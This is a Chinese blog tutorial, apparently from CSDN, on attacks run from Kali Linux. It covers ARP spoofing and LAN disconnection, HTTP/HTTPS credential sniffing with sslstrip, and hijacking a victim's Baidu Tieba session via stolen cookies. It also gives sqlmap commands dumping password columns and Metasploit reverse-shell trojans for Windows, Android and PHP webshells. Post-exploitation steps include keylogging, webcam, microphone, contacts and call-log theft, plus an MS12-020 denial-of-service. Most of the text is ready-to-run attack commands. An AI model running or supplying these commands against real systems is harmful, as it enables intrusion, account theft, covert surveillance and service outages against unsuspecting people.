kali使用mysql注入攻击_基于kali实现的一些攻击

本文介绍了如何在Kali Linux环境下进行网络攻击,包括使用ARP攻击断网,ARP欺骗,HTTP和HTTPS账号密码获取,百度贴吧登录,以及使用SQLMAP进行数据库渗透。此外,还讲解了Metasploit框架下的远程控制木马生成、系统操作、安卓渗透和服务器蓝屏攻击等高级攻击技巧。
摘要由CSDN通过智能技术生成

本文如果出现什么错误,或者有什么建议欢迎随时联系我,谢谢!

1、局域网断网攻击-----ARP攻击(使用kali下的arpspoof工具,为了方便,受害主机为本人主机)

(1)Windows下查询本机IP地址、默认网关:Cmd下ipconfig

(2)查找局域网中的IP地址:

fping -asg 10.22.116.0/241

186252529_1_20200323023523541

(3)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关

模拟ip地址为10.22.116.184的PC是受害者:arpspoof -i eth0 -t 10.22.116.184 10.22.116.2541

此时该PC将无法正常上网----攻击目的达到。

注:ARP断网相当于ARP欺骗的错误配置(不完全配置)造成的现象。

2、局域网下ARP欺骗(目标的IP流量经过我的网卡,进行转发,从网关出去)

(1)开启IP转发流量:

echo 1 > /proc/sys/net/ipv4/ip_forward1

(2)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关

(3)获取本机网卡的图片drifnet -i eth0(利用该条命令配合上述的ARP欺骗,可以看到流经本机网卡的受害人的图片流量)

注:(1)echo命令不会有回显;(2)静态网关的情况下ARP欺骗将不会成功。

3、局域网HTTP账号密码获取(使用工具:ettercap—欺骗、DNS欺骗、流量嗅探)

(1)开启IP流量转发:echo 1 > /proc/sys/net/ipv4/ip_forward

(2)查看内容:cat /proc/sys/net/ipv4/ip_forward(观察上述命令是否成功)

(3)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关

模拟本机是受害者:arpspoof -i eth0 -t 10.22.116.184 10.22.116.2541

(4)ettercap -Tq -i eth0

T 代表启动文本模式 q 代表启动安全模式

注:截取到的信息之后如果用户名为中文时显示出来的不是真正的用户名,此时复制用户名字段,上百度搜索URL解码也可以解码出原始用户名

4、局域网下HTTPS账号密码获取(使用工具sslstrip)—本质是先将HTTPS转化为HTTP,然后根据第三条操作

(1)开启SSH连接:

/etc/init.d/ssh start //连接到Xshell1

(2)vim /etc/ettercap/etter.conf(打开该文件)

去除文本if you use iptables之后的#号(两个#号)

(3)sslstrip -a -f -k

sslstrip:把HTTPS的链接还原为HTTP

(4)开启IP流量转发:echo 1 > /proc/sys/net/ipv4/ip_forward1

(5)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关

(6)ettercap -Tq -i eth0

T 代表启动文本模式 q 代表启动安全模式

该攻击容易使受害人PC出现证书错误网页这一幕

注:单独命令前加!(感叹号)可以看到最近运行的含有该单词的命令。

5、局域网下登录别人的百度贴吧

方法一:

(1)进行ARP欺骗

(2)启动wireshark 抓包工具

此时受害人登录贴吧,抓包工具会抓取一些数据,然后我们保存文件为.pcap文件

(3)ferret 重新生成抓包后的文件

ferret -r cookies.pcap1

然后对新生成的文件执行:cp 该文件名 /root/

(4)hamster (重放流量)

186252529_2_20200323023523744.png

发现需要本地开代理(如下图)

186252529_3_20200323023523900

然后在浏览器输入127.0.0.1:1234,访问该网站

找到www.atcpu.com的网址,点击

注:访问浏览器获取不到信息时,检查是否执行了cd到桌面复制 ferret生成的文件到root/:cp hamster.txt /root/

方法二:

(1)进行ARP欺骗

(2)使用ferretferret -i eth01

(3)浏览器提前设置端口,然后hamster,接着访问127.0.0.1:1234

然后跟方法一最后的步骤相同,登录到受害人的百度贴吧!

6、SQLMAP、ASP网站渗透

(1)形成注入漏洞、获取数据库库名

Sqlmap -u “网址” //-u 检测是否存在注入 、 返回数据库的名字1

需要启动线程(最大线程10)

(2)获取表名Sqlmap -u “网址” --tables//猜解所有表名1

(3)通过猜解的表名,获取列名

Sqlmap -u “网址” --columns -T “表名” //获取列名1

(4)猜解数据Sqlmap -u “网址” --dump -C “列名,列名” -T “表名” //多列猜解 --dump是下载数据,显示的意思 C “列名,列名” 是需要猜解的数据对应的列名1

(5)最后猜解出数据

注:asp网站大多使用access 微软文件数据库、MYSQL使用较多

7、SQLMAP、渗透PHP网站

(1)

Sqlmap -u “网址” //检测是否存在注入1

(2)Sqlmap -u “网址” --is-dba//检测是否存在dba权限,若存在dba权限,则可以写目录,将文件写在文件夹下面1

(3)

Sqlmap -u “网址” --dbs //列出所有的数据库 Sqlmap -u “网址” --current-db //查询自己的数据库1

2

3

(4)Sqlmap -u “网址” --tables -D “数据库名”//根据自己数据库名查询所有的表1

(5)

Sqlmap -u “网址” --columns -T “列名” -D “数据库名” //查询所有的列名1

(6)Sqlmap -u “网址” --dump -C “列名,列名” -T “表名” -D “数据库名” //多列猜解 --dump是下载数据,显示的意思 C “列名,列名” 是需要猜解的数据对应的列名1

(7)

若密码passwd存在解码问题,则登录www.cmd5.com解码!

注:PHP网站使用MYSQL较多

8、SQLMAP–Cookie注入

当使用之前7、8中的常规方法检测是否存在注入不行的时候,尝试Cookie中转注入

(1)例:对于某网站http://www.hajkfkahf.com.cn/about.asp?id=56

sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --cookie “id=56” --level 2 //如果是cookie注入就要把等级提升为level 21

然后就可以开始注入

(2)sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --tables --cookie “id=56” --level 2//猜解所有表名1

(3)

sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --columns-T “表名” --cookie “id=56” --level 2 //猜解所有列名1

(4)sqlmap -u “http://www.hajkfkahf.com.cn/about.asp” --dump -C “username,password” -T “表名” --cookie “id=56” --level 2//假如存在username、password列1

9、Metasploit–远程控制软件生成、系统操作

进入kali虚拟机输入msfconsole,启动命令行模式

exploits模块:漏洞利用模块

payloads模块:shellcode 漏洞执行后的代码

use exploit/windows/smb/ms08_067 _netapi //选择漏洞模块(按下TAB可以进行)show options //查看要填入的参数(此时需要填入一个IP地址)set RHOST IP地址set PAYLOAD windows/meterpreter/reverse_tcp //选择tcp的反向链接1

2

3

4

当所有的设置填充完毕之后,输入exploit进行攻击

在此,介绍怎么去生成一个小木马~

木马:控制端 (控制远程) 服务端(木马程序)

(1)进入kali启动msf:msfconsole

(2)自己IP地址为:

186252529_4_2020032302352472.pngmsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.192.143 LPORT=55555 X > test.exe//根据自己的IP地址生成一个木马(高端口操作比较容易过防火墙)1

然后就会生成一个名为test.exe的木马程序

(3)

use exploit/multi/handler //使用handler这个模块set PAYLOAD windows/meterpreter/reverse_tcp //使用shellcode1

2

然后填写生成木马的IP、PORT(跟上面生成木马时相同)

(4)然后输入exploit执行msf等待木马生效,生效后即可通过命令行进行操作!

(5)输入background执行msf —将已连接的会话放在后台

sessions -l —查看已经连接的会话

sessions -i 1 —连接到之前仅有的一个会话

(6)注入进程:因为木马很可能随时被结束—持久访问ps---得到要注入的PID进程;找到explorer.exe,得到该进程的进程号Migrate PID ---注入进程run vnc---获取受害者电脑桌面1

2

3

(7)文件管理功能

download+文件名 下载文件edit+文件名 编辑文件cat+文件名 查看文件mv+文件名 移动文件rm+文件名 删除文件upload+文件名 上传文件mkdir+文件夹名 创建文件rmdir+文件夹名 删除文件夹shell 直接切到对应位置1

2

3

4

5

6

7

8

9

(8)网络与系统操作

网络arp看arp缓冲表getproxy获取代理ifconfig看IP地址及网卡netstat查看端口链接1

2

3

4

系统

kill 结束进程ps 查看进程reboot 重启电脑reg 修改注册表shell 获取shellshutdown 关机sysinfo 获取电脑信息1

2

3

4

5

6

7

(9)enumdesk tops用户登录数keyscan-dump键盘记录--下载keyscan_start键盘记录--开始keyscan_stop键盘记录--停止uictl获取键盘鼠标控制权//uictl disable/enable keyboard/mouserecord_mic音频录制//record_mic -d 10 表示录制10秒;提前安装mplayer:apt-get install mplayer;录制完成后mplayer+录制文件webcam_chat查看摄像头接口webcam_list查看摄像头列表webcam_stream摄像头视频获取getsystem获取高权限hashdump下载HASH密文1

2

3

4

5

6

7

8

9

10

11

注:不用连接数据库;如果代码出错,可以先删掉metasploits:apt -get remove metasploits,然后再重新安装一遍:apt -get install metasploits;RHOST目标IP,LHOST本地IP;操作过程中可以help查看命令

10、Metasploit–渗透安卓实战

(1)生成木马

use exploit/multi/handler //做一个反弹会话链接,使用handler这个模块set PAYLOAD android/meterpreter/reverse_tcp //使用shellcodeshow options //查看要填入的参数(此时需要填入一个IP地址)set RHOST IP地址set PAYLOAD android/meterpreter/reverse_tcp //选择tcp的反向链接msfpayload android/meterpreter/reverse_tcp LHOST=192.168.192.143 LPORT=55555 R > test.apk //根据自己的IP地址生成一个木马(高端口操作比较容易过防火墙)exploit //等待木马生效1

2

3

4

5

6

7

(2)会话连接好之后search 搜索jpg png bmpdownload下载jpg png bmpwebcam-snap手机截屏webcam_stream开启摄像头webcam_list webcam_stream -i 2前后摄像头互换 参数-icheck_root 检查ROOTdump-calllog下载电话记录;可能出现编码问题,换编码---leafpaddump_contacts下载信息记录geolocate GPS定位1

2

3

4

5

6

7

8

9

11、Metasploit–服务器蓝屏攻击(此攻击参考教程)

(1)确定攻击目标 MS12-020

执行msf,search ms12-020

186252529_5_20200323023524244.png

(2)

use auxiliary/scanner/rdp/ms12-020-check //利用该漏洞show options //查看并填入参数set RHOST 受害服务器IP地址exploit //确定该服务器存在漏洞use auxiliary/dos/windows/rdp/ms12-020-maxchannelidsset RHOST 受害服务器IP地址exploit //攻击服务器,此时达到服务器蓝屏攻击的目的;此时重启受攻击的服务器重启就可恢复execute -f notepad //远程打开记事本1

2

3

4

5

6

7

8

12、Metasploit–生成webshell及应用

(1)在msf中生成一个PHP脚本msfpayload php/meterpreter/reverse_tcp LHOST=kali本机IP地址 R > web.php//生成一个PHP脚本,当做webshellcat web.php //查看脚本内容---通过修改其中的IP地址、端口号可以实现攻击其他pc的目的1

2

(2)上传该脚本(ftp……)

use exploit/multi/handler //做一个反弹会话链接,使用handler这个模块1

然后做set LHOST、LPORT……

然后exploit等待脚本触发(运行PHP文件即可触发)

(3)

通过之前所学,使用可用命令达到期望的目标

…………

作者:苏小酱

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值